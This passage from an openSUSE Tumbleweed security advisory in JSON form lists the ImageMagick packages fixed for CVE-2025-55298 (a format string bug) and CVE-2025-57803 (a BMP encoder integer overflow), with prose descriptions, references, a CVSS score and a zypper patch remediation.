"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to ImageMagick versions 6.9.13-28 and 7.1.2-2, a format string bug vulnerability exists in InterpretImageFilename function where user input is directly passed to FormatLocaleString without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55298",
"url": "https://www.suse.com/security/cve/CVE-2025-55298"
},
{
"category": "external",
"summary": "SUSE Bug 1248780 for CVE-2025-55298",
"url": "https://bugzilla.suse.com/1248780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-28T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-55298"
},
{
"cve": "CVE-2025-57803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-57803"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u0027s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 x width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-57803",
"url": "https://www.suse.com/security/cve/CVE-2025-57803"
},
{
"category": "external",
"summary": "SUSE Bug 1248784 for CVE-2025-57803",
"url": "https://bugzilla.suse.com/1248784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
